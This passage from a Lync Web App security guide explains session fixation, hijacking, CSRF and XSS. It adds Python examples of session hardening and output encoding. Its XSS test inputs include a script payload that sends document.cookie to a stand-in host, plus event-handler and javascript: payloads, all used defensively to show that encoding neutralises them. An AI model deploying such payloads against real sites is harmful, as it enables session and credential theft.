Lync Web App (preview of pages 46–48)
is possible to use a single virtual server for both internal and external access.

In This Section

Best Practices for Lync Web App
Threats to Lync Web App
Securing Lync Web App Sessions
Using PKI, Certificates, and SSL for Lync Web App

Best Practices for Lync Web App

Use a reverse proxy deployed in the perimeter network to enhance the security of Lync Web App on the Internet.

Observe security settings for Internet Information Services (IIS), based on your server operating system version choice:

IIS 7.0: Configuring Security at http://go.microsoft.com/fwlink/?LinkId=145232
IIS 7.5: Internet Information Services (IIS) 7.5 at http://go.microsoft.com/fwlink/?LinkId=217605
Microsoft Lync Server 2010 Security Guide

Choose authentication methods to fit your users' needs:

Integrated Password Authentication. Uses NTLM/Kerberos to provide encrypted logon methods for internal users.
Forms-Based Authentication. Provides a username/password prompt and supports external user authentication, users of Macintosh and Linux, and users not running the Internet Explorer browser.
Custom Authentication. Supports methods such as PIN input and smart cards.

Threats to Lync Web App

This topic describes potential threats to Lync Web App.

Session Fixation

In a session fixation attack, the attacker sets the user's session token before the session is established between the user and the web server. By doing so, the attacker already has the session ID and does not need to determine it after the session is established. Lync Web App is designed to minimize this threat.

Session Hijacking

In session hijacking, the attacker accesses a user's session by sniffing unencrypted traffic on the network. Lync Web App minimizes this threat by using SSL as the default communication protocol between the client and Lync Web App.

Session Riding/Double Riding

Session riding (also known as cross-site request forgery, or CSRF) is when an attacker uses an established session between a user and a web-based application to run commands while posing as the user. The attacker does so by sending the user an email message or otherwise enticing the user to visit a website specifically built to issue requests to the application in the user's name; the user's browser attaches the session cookie to those requests automatically. The commands that can be run by the attacker include opening firewalls, deleting data, and running other commands within the internal network. Lync Web App is designed to prevent an attacker from using this method to control a user's Lync Web App session through a malicious website.
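The three session threats above each have a standard server-side counter: honour only server-minted session IDs and replace the ID at logon (fixation), emit the cookie with Secure and HttpOnly so it travels only inside TLS and is not readable from script (hijacking), and require a session-bound anti-forgery token plus a matching Origin header on state-changing requests (riding). The Python sketch below is an added example written for this page; it is not Lync Web App code and says nothing about how Lync Web App actually implements its mitigations. The cookie name LWASession, the origin https://lwa.contoso.com, the user alice, the forged-request origin evil.example and the attacker's planted ID are all constructed for the demonstration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


@dataclass
class Session:
    user: Optional[str] = None                 # None until logon completes
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


class SessionStore:
    """Server-side session table with one defence per threat in the text.

    Fixation : only IDs minted here are honoured, and the ID is replaced at logon.
    Hijacking: the cookie is emitted with Secure and HttpOnly.
    Riding   : state changes need a per-session token and an allowed Origin.
    """

    COOKIE = "LWASession"   # hypothetical cookie name, not Lync Web App's own

    def __init__(self, origin: str) -> None:
        self.origin = origin                    # the app's own https origin (assumed)
        self._sessions: Dict[str, Session] = {}

    def _mint(self, user: Optional[str] = None) -> str:
        sid = secrets.token_urlsafe(32)         # 256 bits from the OS CSPRNG
        self._sessions[sid] = Session(user=user)
        return sid

    # --- session fixation -------------------------------------------------
    def resolve(self, cookie_header: str) -> Tuple[str, Session]:
        """Map the request's cookie to a session. An ID the server never issued
        (for example one an attacker planted in the victim's browser) is
        discarded and a fresh anonymous session is minted instead."""
        sid = cookie_value(cookie_header, self.COOKIE)
        if sid is None or sid not in self._sessions:
            sid = self._mint()
        return sid, self._sessions[sid]

    def login(self, pre_logon_sid: str, user: str) -> str:
        """Rotate the ID at logon so whatever ID existed before authentication,
        planted or not, never becomes an authenticated one."""
        self._sessions.pop(pre_logon_sid, None)
        return self._mint(user=user)

    # --- session hijacking ------------------------------------------------
    def set_cookie_header(self, sid: str) -> str:
        """Secure: never sent over clear-text HTTP, so a sniffer on the path sees
        only TLS. HttpOnly: not readable from script, which limits cookie theft."""
        return f"Set-Cookie: {self.COOKIE}={sid}; Secure; HttpOnly; Path=/"

    # --- session riding (CSRF) --------------------------------------------
    def csrf_token(self, sid: str) -> str:
        return self._sessions[sid].csrf_token

    def authorize_state_change(self, sid: str, headers: dict, form: dict) -> bool:
        """A forged cross-site request carries the cookie automatically but
        cannot read the session-bound token or forge the Origin header."""
        session = self._sessions.get(sid)
        if session is None or session.user is None:
            return False
        if headers.get("Origin") != self.origin:
            return False
        return hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token)


def cookie_value(cookie_header: str, name: str) -> Optional[str]:
    """Pull one cookie out of a 'Cookie:' header value."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name and value:
            return value
    return None


def demo() -> dict:
    """Run the three attacks against the store and report what each achieved."""
    store = SessionStore(origin="https://lwa.contoso.com")   # assumed origin

    # Fixation: attacker pre-sets the victim's cookie to an ID they already know.
    planted = "attacker-chosen-id"                           # constructed input
    sid_before, _ = store.resolve(f"{store.COOKIE}={planted}")
    sid_after = store.login(sid_before, "alice")
    _, attacker_view = store.resolve(f"{store.COOKIE}={planted}")

    # Hijacking: the cookie the browser stores must carry Secure and HttpOnly.
    cookie = store.set_cookie_header(sid_after)

    # Riding: a form auto-submitted from evil.example sends the cookie but no token.
    forged = store.authorize_state_change(
        sid_after, {"Origin": "https://evil.example"}, {})
    genuine = store.authorize_state_change(
        sid_after, {"Origin": "https://lwa.contoso.com"},
        {"csrf_token": store.csrf_token(sid_after)})

    return {
        "planted_id_honoured": sid_before == planted,
        "id_rotated_at_logon": sid_after != sid_before,
        "attacker_session_anonymous": attacker_view.user is None,
        "cookie_secure_httponly": "Secure" in cookie and "HttpOnly" in cookie,
        "forged_request_allowed": forged,
        "genuine_request_allowed": genuine,
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check:28} {outcome}")
```

The Origin check is a second, independent line of defence: a browser sets Origin itself on cross-site POSTs and script cannot override it, so even if the token leaked the forged request would still be refused. The token comparison uses hmac.compare_digest rather than == so that its timing does not depend on how many leading characters of a guess are right.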
Cross Site Scripting (CSS, XSS, Code Insertion)

A cross-site scripting attack (sometimes referred to as a CSS, XSS, or code insertion attack) occurs when an attacker uses a web application to send malicious software, generally in the form of a script, to a target user. Because the script is delivered from the application's own origin, the target user's browser has no way of detecting that it should not be trusted and will run it. When the malicious script runs, it can access cookies, session tokens, or other sensitive information that is retained by the end user's browser. The application-side defence is to encode every untrusted value for the context in which it is emitted (HTML text, HTML attribute, or URL) rather than concatenating it into the page.
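As an added example, not code from the guide or from Lync Web App: a vulnerable rendering function next to its hardened form. The hypothetical "contact card" fragment and the three attack strings are constructed for this page. The hardened version encodes each untrusted value for the context it lands in (HTML attribute, HTML text, URL parameter), and script_can_run parses the output with Python's html.parser, roughly as a browser would, to confirm whether anything executable survives.

```python
import html
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import quote

# Constructed attack inputs, one aimed at each output context.
ATTACK_INPUTS = (
    '" onmouseover="alert(document.cookie)',                                # attribute context
    '<script>new Image().src="https://evil.example/?c="+document.cookie</script>',  # text node
    'javascript:alert(1)',                                                  # URL parameter
)


def render_contact_card_unsafe(display_name: str, status_note: str, meeting_id: str) -> str:
    """Vulnerable: untrusted values are concatenated straight into the markup."""
    return (f'<div class="contact" data-name="{display_name}">'
            f'<span>{status_note}</span>'
            f'<a href="/meet?id={meeting_id}">Join</a></div>')


def render_contact_card(display_name: str, status_note: str, meeting_id: str) -> str:
    """Hardened: each value is encoded for the context it lands in.

    html.escape(quote=True) turns < > & " ' into entities, so a value can
    neither close the attribute it sits in nor open a new tag; quote(safe="")
    percent-encodes everything but unreserved characters, so the parameter
    cannot escape the query string or turn the link into a javascript: URL.
    """
    return (f'<div class="contact" data-name="{html.escape(display_name, quote=True)}">'
            f'<span>{html.escape(status_note, quote=True)}</span>'
            f'<a href="/meet?id={quote(meeting_id, safe="")}">Join</a></div>')


class _TagCollector(HTMLParser):
    """Records every start tag and attribute the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.attrs: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend((k, v or "") for k, v in attrs)


def parsed_structure(fragment: str) -> Tuple[List[str], List[Tuple[str, str]]]:
    """Parse a fragment and return the tags and (name, decoded value) attributes."""
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags, p.attrs


def script_can_run(fragment: str) -> bool:
    """True if the fragment contains a script element, an on* event handler
    attribute, or a javascript: link, i.e. anything a browser would execute."""
    tags, attrs = parsed_structure(fragment)
    return ("script" in tags
            or any(k.lower().startswith("on") for k, _ in attrs)
            or any(k == "href" and v.strip().lower().startswith("javascript:")
                   for k, v in attrs))


if __name__ == "__main__":
    print("unsafe  executable:", script_can_run(render_contact_card_unsafe(*ATTACK_INPUTS)))
    print("hardened executable:", script_can_run(render_contact_card(*ATTACK_INPUTS)))
```

Note that the hardened output still carries the attacker's text verbatim once decoded (data-name reads back as the original string), which is the point: the data is preserved, only its ability to change the page structure is removed. Encoding is per context, so the same value needs a different encoder if it is later emitted inside a script block or a CSS property.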